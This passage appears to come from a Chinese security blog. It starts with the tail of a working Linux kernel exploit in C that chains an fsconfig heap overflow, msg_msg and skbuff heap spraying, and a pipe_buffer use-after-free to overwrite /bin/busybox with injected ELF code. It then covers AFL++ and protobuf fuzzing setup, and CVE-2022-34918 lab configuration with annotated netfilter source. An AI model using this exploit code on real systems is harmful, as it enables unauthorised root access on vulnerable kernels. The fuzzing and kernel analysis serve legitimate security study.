logd("[!] can't found corrupted msg_msg, and kernel may crash :(\n");
clean_msq_1();
return 1;
}

// clean uncorrupted msg_msg
logd("[*] clean unused msg_msg ...\n");
clean_msq_1();

// realloc 0x400 slab with msg_msg
logd("[*] alloc `struct msg_msg` to re-acquire the 0x400 slab freed by msg_msgseg ...\n");
for (int i = 0; i < NUM_MSQIDS_2; i++) {
memset(&msg_b, 0, sizeof(msg_b));
memset(msg_b.mtext, 'W', sizeof(msg_b.mtext));
((int *)&msg_b.mtext)[0] = MSG_SIG;
((int *)&msg_b.mtext)[1] = i;
for (int j = 0; j < 0x10; j++) {
msg_b.mtype = MTYPE_B | (j << 8);
if (msgsnd(msqid_2[i], &msg_b, sizeof(msg_b.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}
}

// hope leak happen
{
ssize_t copy_size = msgrcv(list1_corrupted_msqid, &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);
if ((copy_size < 0) || (copy_size != sizeof(msg_a_oob.mtext))) {
logd("[-] recv from corrupted msg_msg failed\n");
die();
}
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
struct msg_msg *p = (struct msg_msg *)oob_data;
if (((int *)&p->mtext)[0] != MSG_SIG) {
logd("[-] bad luck, we don't catch 0x400 msg_msg\n");
clean_msq_2();
return 1;
}
logd("[*] it works :)\n");

list2_leak_msqid = msqid_2[((int *)&p->mtext)[1]];
list2_leak_mtype = p->m_type;
list2_uaf_msg_addr = p->m_list.prev;
list2_uaf_mtype = p->m_type - 0x0100;
msqid_2[((int *)&p->mtext)[1]] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
hexdump(msg_a_oob.mtext + sizeof(msg_a.mtext), 0x40);
logd("[+] leak list2_leak_msqid: %d\n", list2_leak_msqid);
logd("[+] leak list2_leak_mtype: 0x%x\n", list2_leak_mtype);
logd("[+] leak list2_uaf_msg_addr: 0x%lx\n", list2_uaf_msg_addr);
logd("[+] leak list2_uaf_mtype: 0x%x\n", list2_uaf_mtype);
}

logd("[*] alloc msg_msg as heap buffer with known address\n");
{
for (int j = ((list2_leak_mtype + 0x100) >> 8); j < 0x10; j++) {
msgrcv(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), MTYPE_B | (j << 8), IPC_NOWAIT);
}
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = list2_uaf_msg_addr;
p->m_list.prev = 0xdeadbeefdeadbeef;
p->m_type = MTYPE_A;

memset(&msg_b, 0, sizeof(msg_b));
memcpy(msg_b.mtext, buff, sizeof(msg_b.mtext));
msg_b.mtype = MTYPE_B;
if (msgsnd(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

logd("[*] fetch heap_buffer address by oob read again\n");
{
ssize_t copy_size = msgrcv(list1_corrupted_msqid, &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);
if ((copy_size < 0) || (copy_size != sizeof(msg_a_oob.mtext))) {
logd("[-] Recv from corrupted msg_msg failed\n");
die();
}
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
struct msg_msg *p = (struct msg_msg *)oob_data;
if (((int *)&p->mtext)[0] != MSG_SIG) {
logd("[-] I don't think this can happen\n");
die();
}
heap_buffer_addr = p->m_list.next + sizeof(struct msg_msg);
logd("[+] heap_buffer_addr: 0x%lx\n", heap_buffer_addr);
if (strlen((char *)&heap_buffer_addr) < 8) {
logd("[-] pointer can't contain 0x00 bytes\n");
die();
}
}

// clean uncorrupted msg_msg
logd("[*] clean unused msg_msg ...\n");
clean_msq_2();

return 0;
}

int exploit_step2(int fd) {
char buff[0x1000];

logd("[*] prepare fsconfig heap overflow\n");
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

// alloc msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
logd("[*] sparying msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
memset(&msg_a, 0, sizeof(msg_a));
msg_a.mtype = MTYPE_A;
memset(msg_a.mtext, 'Q', sizeof(msg_a.mtext));
((int *)&msg_a.mtext)[0] = MSG_SIG;
((int *)&msg_a.mtext)[1] = i;
if (msgsnd(msqid_1[i], &msg_a, sizeof(msg_a.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

// trigger oob write to overwrite msg_msg.next (hopes)
logd("[*] trigger oob write in `legacy_parse_param` to corrupt msg_msg.next\n");
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = heap_buffer_addr;
p->m_list.prev = 0xdeadbeefdeadbeef;
p->m_type = MTYPE_A; // with '=' appended
fsconfig(fd, FSCONFIG_SET_STRING, buff, "\x00", 0);

// free uaf msg_msg
logd("[*] free uaf msg_msg from correct msqid\n");
if (msgrcv(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), list2_uaf_mtype, 0) < 0) {
logd("[-] msgrcv() fail\n");
die();
}

// spary skbuff_data to re-acquire uaf msg_msg and fake the header
logd("[*] spray skbuff_data to re-acquire the 0x400 slab freed by msg_msg\n");
{
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = heap_buffer_addr + 0x80;
p->m_list.prev = heap_buffer_addr + 0x80;
p->m_ts = 0x100;
p->m_type = MTYPE_FAKE;
p->next = 0;
p->security = 0;
spray_skbuff_data(buff, 0x400 - 0x140);
}

// free uaf msg_msg
logd("[*] free skbuff_data using fake msqid\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
if (msgrcv(msqid_1[i], &msg_b, sizeof(msg_b.mtext), MTYPE_FAKE, IPC_NOWAIT) > 0) {
logd("[*] freed using msqid %d\n", i);
break;
}
}

// filled with pipe_buffer
logd("[*] spray pipe_buffer to re-acquire the 0x400 slab freed by skbuff_data\n");
int busybox = open("/bin/busybox", O_RDONLY);
if (busybox < 0) {
perror("open busybox");
die();
}
for (int i = 0; i < NUM_PIPES; i++) {
if (pipe(dummy_pipe[i])) {
logd("[-] Alloc pipe failed\n");
die();
}

const unsigned pipe_size = fcntl(dummy_pipe[i][1], F_GETPIPE_SZ);
static char tmp_buff[4096];

/* fill the pipe completely; each pipe_buffer will now have
the PIPE_BUF_FLAG_CAN_MERGE flag */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(tmp_buff) ? sizeof(tmp_buff) : r;
write(dummy_pipe[i][1], tmp_buff, n);
r -= n;
}

/* drain the pipe, freeing all pipe_buffer instances (but
leaving the flags initialized) */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(tmp_buff) ? sizeof(tmp_buff) : r;
read(dummy_pipe[i][0], tmp_buff, n);
r -= n;
}

write(dummy_pipe[i][1], buff, 0x100 + i);

loff_t offset = 1;
ssize_t nbytes = splice(busybox, &offset, dummy_pipe[i][1], NULL, 1, 0);
if (nbytes < 0) {
perror("splice failed");
die();
}
}

logd("[*] free skbuff_data to make pipe_buffer become UAF\n");
int uaf_pipe_idx = 0;
char pipe_buffer_backup[0x280];
int PIPE_BUF_FLAG_CAN_MERGE = 0x10;
{
void *ptr = buff;
uint64_t size = 0x400 - 0x140;
for (int i = 0; i < NUM_SOCKETS; i++) {
for (int j = 0; j < NUM_SKBUFFS; j++) {
if (read(sock_pairs[i][1], ptr, size) < 0) {
logd("[-] read from sock pairs failed\n");
die();
}
uint32_t test_size = ((uint32_t *)ptr)[3];
if ((test_size >= 0x100) && (test_size < 0x100 + NUM_PIPES)) {
uaf_pipe_idx = test_size - 0x100;
logd("[*] uaf_pipe_idx: %d\n", uaf_pipe_idx);
memcpy(pipe_buffer_backup, ptr, 0x280);
}
}
}
}

logd("[*] edit pipe_buffer->flags\n");
{
memset(buff, 0, sizeof(buff));
memcpy(buff, pipe_buffer_backup, 0x280);
((uint64_t *)buff)[6] = 0; // offset | len
((uint64_t *)buff)[8] = PIPE_BUF_FLAG_CAN_MERGE; // flag
spray_skbuff_data(buff, 0x400 - 0x140);
}

logd("[*] try to overwrite /bin/busybox\n");
{
ssize_t nbytes = write(dummy_pipe[uaf_pipe_idx][1], elfcode, sizeof(elfcode));
if (nbytes < 0) {
perror("write failed");
die();
}
if ((size_t)nbytes < 2) {
fprintf(stderr, "short write\n");
die();
}
}

logd("[+] exploit success\n");
return 0;
}

/*
 * Entry point. Forks a worker child and makes the parent wait on a pipe:
 *   - child: runs the init_*() / bind_cpu() setup, then loops exploit_step1()
 *     and exploit_step2() until each returns 0, signals the parent with one
 *     byte on sync_pipe, and then sleeps forever;
 *   - parent: blocks until that byte arrives (or the read otherwise returns)
 *     and exits with status 0.
 */
int main(void) {
int sync_pipe[2];
pipe(sync_pipe); /* return value is not checked */

pid_t pid = fork();
if (!pid) {
/* child process */
logd("[+] perform initialization\n");
init_unshare();
bind_cpu();
init_msq();
init_sock();

int fd;

fd = call_fsopen();
logd("[+] perform exploit step1\n");
/* a non-zero return means "try again": reopen a fresh fs context each round */
while (exploit_step1(fd)) {
logd("[!] retry step1 ...\n");

close(fd);
fd = call_fsopen();
}

/* step2 gets its own fs context; the descriptor used by step1 is not closed here */
fd = call_fsopen();
logd("[+] perform exploit step2\n");
while (exploit_step2(fd)) {
logd("[!] retry step2 ...\n");

close(fd);
fd = call_fsopen();
}

/* wake the parent, then stay alive indefinitely */
write(sync_pipe[1], "A", 1);
while (1) {
sleep(10);
}
} else {
/* parent (also taken when fork() fails and returns -1): wait for the child's byte */
char sync;
read(sync_pipe[0], &sync, 1);
}

return 0;
}

AFL++ 安装

AFL(American Fuzzy Lop)是由安全研究员 Michał Zalewski 开发的一款基于覆盖引导(Coverage-guided)的模糊测试工具

AFL++ 除了继承AFL的功能外,还添加了以下功能:

  • 并行测试:允许在多个处理器核心上运行测试,以加速测试过程
  • 基于云的测试:将测试工作负载部署到云服务器上,以节省本地资源
  • 自适应测试:根据目标程序的复杂性和测试历史来调整测试策略,以提高测试效果

安装依赖:

1
2
3
4
sudo apt-get update
sudo apt-get install -y build-essential python3-dev automake git flex bison libglib2.0-dev libpixman-1-dev python3-setuptools
sudo apt-get install -y lld-11 llvm-11 llvm-11-dev clang-11 || sudo apt-get install -y lld llvm llvm-dev clang
sudo apt-get install -y gcc-$(gcc --version|head -n1|sed 's/.* //'|sed 's/\..*//')-plugin-dev libstdc++-$(gcc --version|head -n1|sed 's/.* //'|sed 's/\..*//')-dev

安装 AFL++:

1
2
3
4
git clone https://github.com/AFLplusplus/AFLplusplus && cd AFLplusplus
export LLVM_CONFIG="llvm-config-11"
make distrib
sudo make install

protobuf && libprotobuf

Protocol Buffers 是一个开源的序列化协议,用于将数据结构序列化为二进制格式,以便在网络上传输和使用

1
2
3
4
5
6
7
8
wget https://github.com/protocolbuffers/protobuf/releases/download/v3.14.0/protobuf-cpp-3.14.0.zip
unzip protobuf-cpp-3.14.0.zip
cd protobuf-3.14.0
./autogen.sh
./configure
make -j8
sudo make install
sudo ldconfig
  • PS:新版本的 Protocol Buffers 需要 g++14 的支持

libprotobuf 是 protobuf 库的 C++ 实现,在 afl-libprotobuf-mutator 的 build 脚本中会自动安装 libprotobuf(同样需要 g++14 的支持)

afl-libprotobuf-mutator 安装

afl-libprotobuf-mutator 是一个模糊测试工具,用于对基于 Protocol Buffers 协议编写的程序进行模糊测试,它是一个基于AFL(American Fuzzy Lop)的扩展,专为 Protocol Buffers 提供了一种特殊的模糊测试方法

  • Protocol Buffers 是一种轻量级数据交换格式,用于序列化和反序列化结构化数据
  • afl-libprotobuf-mutator 允许您使用 AFL 的随机测试用例来攻击基于 Protocol Buffers 的程序,从而找到潜在的错误和漏洞

在测试过程中,afl-libprotobuf-mutator 将自动为 Protocol Buffers 消息生成随机 mutations,并将其传递给目标程序,AFL 将分析目标程序的行为并报告潜在的错误

1
git clone https://github.com/thebabush/afl-libprotobuf-mutator.git

在开始编译前需要修改 build.sh 以降低 libprotobuf 对 g++ 版本的需求:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/bin/bash
# Build libprotobuf-mutator (with its bundled protobuf) into ./external.

# Fetch libprotobuf-mutator and pin it to a fixed commit.
git clone https://github.com/google/libprotobuf-mutator.git
cd libprotobuf-mutator
git checkout e33a10c9db21244f6e27f13b4df02c72cc625573
cd ..
# Append a "-DCMAKE_NO_SYSTEM_FROM_IMPORTED=TRUE" line after the line matching
# CONFIGURE_COMMAND in the protobuf external-project cmake file.
sed -i "/CONFIGURE_COMMAND/a \ \ \ \ \ \ \ \ -DCMAKE_NO_SYSTEM_FROM_IMPORTED=TRUE" libprotobuf-mutator/cmake/external/protobuf.cmake
mkdir -p external
mkdir -p build

# Configure with the protobuf download enabled, -fPIC for C and C++, and
# ../external as the install prefix; then build and install.
pushd build
cmake ../libprotobuf-mutator -DLIB_PROTO_MUTATOR_DOWNLOAD_PROTOBUF=1 -DCMAKE_INSTALL_PREFIX=../external/ -DCMAKE_C_FLAGS="-fPIC" -DCMAKE_CXX_FLAGS="-fPIC"
make -j 12
make install
popd

# Copy the protobuf headers and the protoc binary produced by the build
# next to the installed mutator library.
mkdir -p ./external/bin ./external/include ./external/lib/
cp -r ./build/external.protobuf/include/* ./external/include
cp ./build/external.protobuf/bin/protoc ./external/bin/

然后检查 afl-libprotobuf-mutator/src/mutator.cc 的 AFLPlusPlus 接口是否匹配(若不匹配可以直接修改函数名)

最后开始编译:

1
2
cd afl-libprotobuf-mutator
./build.sh && make
  • 在当前工作路径下将会生成 dumper、libmutator.so、mutator 三个文件

protobuf_ctf_fuzz 安装

protobuf_ctf_fuzz 是一个大佬制作的 ctf fuzz 工具,项目地址如下:

我们只需要将 protobuf_ctf_fuzz/kp_src 中的 mutator.cc 文件拷贝到 afl-libprotobuf-mutator/src 中,再次编译 afl-libprotobuf-mutator 即可

使用 afl-libprotobuf-mutator

protobuf 代码编写完成后,覆盖保存至 afl-libprotobuf-mutator/gen/out.proto,路径必须完全一致,若遇到重名文件 out.proto 则直接替换

喂入 AFL 的 testcase 必须是 protobuf bin 格式的数据,即需要事先用 afl-libprotobuf-mutator/dumper 将明文输入转换为 protobuf bin 格式的数据

这里的 dumper.cc 需要根据 out.proto 进行编写(按照 protobuf_ctf_fuzz/kp_src/dumper.cc 中的模板进行修改即可)

重新编译 afl-libprotobuf-mutator 后使用如下命令启动:

1
2
3
4
5
6
7
8
9
mkdir workdir
mkdir workdir/fuzz_input

export AFL_CUSTOM_MUTATOR_ONLY=1
export AFL_I_DONT_CARE_ABOUT_MISSING_CRASHES=1
export AFL_CUSTOM_MUTATOR_LIBRARY=/home/yhellow/Tools/afl-libprotobuf-mutator/libmutator.so
export AFL_USE_QASAN=1

afl-fuzz -i workdir/fuzz_input -o workdir/fuzz_output -Q -- ./pwn

CVE-2022-34918

1
Linux version 5.17.15 (yhellow@yhellow-virtual-machine) (gcc (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0, GNU ld (GNU Binutils for Ubuntu) 2.34) #2 SMP PREEMPT Tue Dec 12 20:07:22 CST 2023
1
2
3
4
5
6
7
8
9
10
# Boot ./bzImage with ./rootfs.cpio as initrd on a single-core qemu64 CPU
# with SMEP and SMAP enabled; the kernel command line turns on PTI and KASLR,
# and makes an oops panic. "quiet" is the kernel parameter that suppresses
# boot messages.
qemu-system-x86_64 \
-m 256M \
-nographic \
-no-reboot \
-kernel "./bzImage" \
-append "console=ttyS0 quiet loglevel=3 oops=panic panic=-1 pti=on kaslr" \
-monitor /dev/null \
-initrd "./rootfs.cpio" \
-cpu qemu64,+smep,+smap \
-smp cores=1
  • smap,smep,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/bin/sh
# Guest init script: set up the pseudo filesystems, lock down the flag and
# kernel info leaks, hand an unprivileged shell to the player, then power off.

# Mount proc/sysfs/devtmpfs, populate /dev and set up pseudo-terminals.
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
# The flag is owned by root:root and readable by its owner only.
chown root /root/flag
chgrp root /root/flag
chmod 400 /root/flag

# Restrict kernel pointer exposure and dmesg access.
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

# Start the interactive shell as uid/gid 1000 on a controlling terminal.
setsid /bin/cttyhack setuidgid 1000 /bin/sh

# Runs once the shell exits: unmount and power the machine off immediately.
umount /proc
umount /sys

poweroff -d 0 -f

内核下载: Index of /pub/linux/kernel/v5.x/

关键的编译选项如下:

1
2
3
4
5
6
7
CONFIG_NF_TABLES=y
CONFIG_NETFILTER_NETLINK=y
CONFIG_BINFMT_MISC=m
CONFIG_USER_NS=y

CONFIG_E1000=m
CONFIG_E1000E=m

Netfilter 介绍

Netfilter 是一个 Linux 内核模块,用于防火墙功能,它提供了一个灵活的框架,允许用户自定义防火墙规则,以控制网络流量和保护网络安全

Netfilter 模块是 Linux 内核中流量过滤器的基础,可以与多种其他模块一起使用(例如:iptables 和 ip6tables),具有如下功能:

  • 网络地址转换(Network Address Translate)
  • 数据包内容修改
  • 数据包过滤的防火墙功能

在分析 Netfilter 之前先解释一些防火墙的相关概念:

链的概念:

  • 数据报文从进入服务器到出来会经过5道关卡,分别为:
    • Prerouting(路由前)、Input(输入)、Output(输出)、Forward(转发)、Postrouting(路由后)
  • 每一道关卡中有多个规则,数据报文必须按顺序一个一个匹配这些规则,这些规则串起来就像一条链,所以我们把这些关卡都叫“链”

1702384117476

表的概念:

  • 每一条链上有多条规则,有些规则的作用相似,多条具有相同功能的规则合在一起就组成了一个“表”
  • Netfilter 模块拥有5个表:
    • filter 表:用于过滤包,有 INPUT、FORWARD、OUTPUT 三个链(最常用的表)
    • nat 表:用于网络地址转换,有 PREROUTING、OUTPUT、POSTROUTING 三个链
    • mangle 表:用于给数据包做标记,几乎用不到
    • raw 表:可以实现不追踪某些数据包
    • security 表:用于强制访问控制(MAC)的网络规则(在centos6中并没有)

规则的概念:

  • 规则主要包含 “条件&动作”,即匹配出符合什么条件(规则)后,对它采取怎样的动作
  • 规则被添加到指定表的指定链中,由表达式和语句组成

表达式的概念:

  • 表达式表示值,可以是网络地址、端口号等常量,也可以是在规则集评估期间从数据包中收集的数据
  • 可以使用二进制、逻辑、关系和其他类型的表达式组合表达式以形成复杂或关系(匹配)表达式
  • 每个表达式都有一个数据类型,它决定了符号值的大小、解析和表示以及与其他表达式的类型兼容性

该模块的初始化由 nfnetlink_net_init 函数执行:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/*
 * Per-network-namespace init: creates the kernel-side NETLINK_NETFILTER
 * socket for `net` and stores it in the namespace's nfnl_net state.
 * Returns 0 on success, -ENOMEM if the socket could not be created.
 */
static int __net_init nfnetlink_net_init(struct net *net)
{
struct nfnl_net *nfnlnet = nfnl_pernet(net);
struct netlink_kernel_cfg cfg = {
.groups = NFNLGRP_MAX,
.input = nfnetlink_rcv, /* callback registered as the socket's input handler */
#ifdef CONFIG_MODULES
.bind = nfnetlink_bind, /* only registered when CONFIG_MODULES is set */
#endif
};

nfnlnet->nfnl = netlink_kernel_create(net, NETLINK_NETFILTER, &cfg);
if (!nfnlnet->nfnl)
return -ENOMEM;
return 0;
}
  • 如果后续收到 netfilter 的消息则会调用 netlink_kernel_cfg->input 函数,也即 nfnetlink_rcv 函数

创建 table 的函数:nf_tables_newtable

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
/*
 * Handler for creating an nftables table.
 *
 * Looks the table up by NFTA_TABLE_NAME. If it already exists the request
 * is rejected (NLM_F_EXCL -> -EEXIST, NLM_F_REPLACE -> -EOPNOTSUPP) or
 * turned into an update via nf_tables_updtable(). Otherwise a new
 * nft_table is allocated, initialised from the netlink attributes, recorded
 * through nft_trans_table_add() and appended to the per-net table list.
 *
 * Returns 0 on success or a negative errno; on failure everything
 * allocated so far is released through the err_* labels.
 */
static int nf_tables_newtable(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
struct nftables_pernet *nft_net = nft_pernet(info->net);
struct netlink_ext_ack *extack = info->extack;
u8 genmask = nft_genmask_next(info->net);
u8 family = info->nfmsg->nfgen_family;
struct net *net = info->net;
const struct nlattr *attr;
struct nft_table *table;
struct nft_ctx ctx;
u32 flags = 0;
int err;

lockdep_assert_held(&nft_net->commit_mutex);
attr = nla[NFTA_TABLE_NAME];
table = nft_table_lookup(net, attr, family, genmask,
NETLINK_CB(skb).portid); /* check whether a table named NFTA_TABLE_NAME already exists */
if (IS_ERR(table)) {
/* -ENOENT means "not found" and falls through to creation; any other error is returned */
if (PTR_ERR(table) != -ENOENT)
return PTR_ERR(table);
} else {
if (info->nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, attr);
return -EEXIST;
}
if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
return -EOPNOTSUPP;

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);

return nf_tables_updtable(&ctx); /* the table already exists: update it */
}

if (nla[NFTA_TABLE_FLAGS]) {
flags = ntohl(nla_get_be32(nla[NFTA_TABLE_FLAGS]));
/* reject any flag bit outside NFT_TABLE_F_MASK */
if (flags & ~NFT_TABLE_F_MASK)
return -EOPNOTSUPP;
}

err = -ENOMEM;
table = kzalloc(sizeof(*table), GFP_KERNEL); /* the table does not exist: allocate and initialise it */
if (table == NULL)
goto err_kzalloc;

table->name = nla_strdup(attr, GFP_KERNEL);
if (table->name == NULL)
goto err_strdup;

if (nla[NFTA_TABLE_USERDATA]) {
table->udata = nla_memdup(nla[NFTA_TABLE_USERDATA], GFP_KERNEL);
if (table->udata == NULL)
goto err_table_udata;

table->udlen = nla_len(nla[NFTA_TABLE_USERDATA]);
}

err = rhltable_init(&table->chains_ht, &nft_chain_ht_params);
if (err)
goto err_chain_ht;

INIT_LIST_HEAD(&table->chains); /* initialise the four lists */
INIT_LIST_HEAD(&table->sets);
INIT_LIST_HEAD(&table->objects);
INIT_LIST_HEAD(&table->flowtables);
table->family = family;
table->flags = flags;
table->handle = ++table_handle;
if (table->flags & NFT_TABLE_F_OWNER)
table->nlpid = NETLINK_CB(skb).portid;

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla); /* set up the nftables context with the new table */
err = nft_trans_table_add(&ctx, NFT_MSG_NEWTABLE);
if (err < 0)
goto err_trans;

list_add_tail_rcu(&table->list, &nft_net->tables);
return 0;
/* error unwinding: each label releases one resource and falls through to the next */
err_trans:
rhltable_destroy(&table->chains_ht);
err_chain_ht:
kfree(table->udata);
err_table_udata:
kfree(table->name);
err_strdup:
kfree(table);
err_kzalloc:
return err;
}

创建 chain 的函数:nf_tables_newchain

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
/*
 * Handle a "new chain" request.
 *
 * Resolves the owning table, then tries to find an existing chain by handle
 * or by name. Policy and flags attributes are validated; if the chain exists
 * the request is forwarded to nf_tables_updchain(), otherwise to
 * nf_tables_addchain().
 *
 * Returns the result of the update/add helper, or a negative errno when
 * validation fails.
 */
static int nf_tables_newchain(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
struct nftables_pernet *nft_net = nft_pernet(info->net);
struct netlink_ext_ack *extack = info->extack;
u8 genmask = nft_genmask_next(info->net);
u8 family = info->nfmsg->nfgen_family;
struct nft_chain *chain = NULL;
struct net *net = info->net;
const struct nlattr *attr;
struct nft_table *table;
u8 policy = NF_ACCEPT;
struct nft_ctx ctx;
u64 handle = 0;
u32 flags = 0;

lockdep_assert_held(&nft_net->commit_mutex);

table = nft_table_lookup(net, nla[NFTA_CHAIN_TABLE], family, genmask,
NETLINK_CB(skb).portid); /* the table must exist; bail out otherwise */
if (IS_ERR(table)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_TABLE]);
return PTR_ERR(table);
}

chain = NULL;
attr = nla[NFTA_CHAIN_NAME]; /* look for an existing chain: update it if found, add a new one if not */

if (nla[NFTA_CHAIN_HANDLE]) { /* look the chain up via nla[NFTA_CHAIN_HANDLE] */
handle = be64_to_cpu(nla_get_be64(nla[NFTA_CHAIN_HANDLE]));
chain = nft_chain_lookup_byhandle(table, handle, genmask);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_HANDLE]);
return PTR_ERR(chain);
}
attr = nla[NFTA_CHAIN_HANDLE];
} else if (nla[NFTA_CHAIN_NAME]) { /* look the chain up via nla[NFTA_CHAIN_NAME] */
chain = nft_chain_lookup(net, table, attr, genmask);
if (IS_ERR(chain)) {
/* only -ENOENT is tolerated here; it means a new chain will be created */
if (PTR_ERR(chain) != -ENOENT) {
NL_SET_BAD_ATTR(extack, attr);
return PTR_ERR(chain);
}
chain = NULL;
}
} else if (!nla[NFTA_CHAIN_ID]) {
/* none of handle, name or id was supplied */
return -EINVAL;
}

if (nla[NFTA_CHAIN_POLICY]) {
/* a policy is rejected for an existing chain that is not a base chain */
if (chain != NULL &&
!nft_is_base_chain(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_POLICY]);
return -EOPNOTSUPP;
}

/* ...and for a new chain that comes without a hook attribute */
if (chain == NULL &&
nla[NFTA_CHAIN_HOOK] == NULL) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_POLICY]);
return -EOPNOTSUPP;
}

policy = ntohl(nla_get_be32(nla[NFTA_CHAIN_POLICY]));
switch (policy) {
case NF_DROP:
case NF_ACCEPT:
break;
default:
return -EINVAL;
}
}

/* explicit flags win; otherwise inherit the flags of the existing chain */
if (nla[NFTA_CHAIN_FLAGS])
flags = ntohl(nla_get_be32(nla[NFTA_CHAIN_FLAGS]));
else if (chain)
flags = chain->flags;

if (flags & ~NFT_CHAIN_FLAGS)
return -EOPNOTSUPP;

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, chain, nla);

if (chain != NULL) {
if (info->nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, attr);
return -EEXIST;
}
if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
return -EOPNOTSUPP;

flags |= chain->flags & NFT_CHAIN_BASE;
return nf_tables_updchain(&ctx, genmask, policy, flags, attr,
extack); /* chain found: update it */
}

return nf_tables_addchain(&ctx, family, genmask, policy, flags, extack); /* chain not found: create it */
}

创建 rule & expression 的函数:nf_tables_newrule

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
/*
 * Handle a "new rule" request (a rule together with its expressions).
 *
 * Steps, in order:
 *   1. resolve the table and the chain (by name or by chain id);
 *   2. resolve an existing rule by handle (replace) or a position rule
 *      (insert relative to it), or allocate a fresh handle;
 *   3. parse every nested expression into expr_info[] and sum their sizes;
 *   4. allocate the rule with room for the expressions and optional userdata;
 *   5. instantiate each expression inside the rule;
 *   6. queue the transaction and link the rule into the chain.
 *
 * Returns 0 (or the result of nft_table_validate()) on success, a negative
 * errno otherwise. Failures after allocation unwind through the err_* labels.
 */
static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
struct nftables_pernet *nft_net = nft_pernet(info->net);
struct netlink_ext_ack *extack = info->extack;
unsigned int size, i, n, ulen = 0, usize = 0;
u8 genmask = nft_genmask_next(info->net);
struct nft_rule *rule, *old_rule = NULL;
struct nft_expr_info *expr_info = NULL;
u8 family = info->nfmsg->nfgen_family;
struct nft_flow_rule *flow = NULL;
struct net *net = info->net;
struct nft_userdata *udata;
struct nft_table *table;
struct nft_chain *chain;
struct nft_trans *trans;
u64 handle, pos_handle;
struct nft_expr *expr;
struct nft_ctx ctx;
struct nlattr *tmp;
int err, rem;

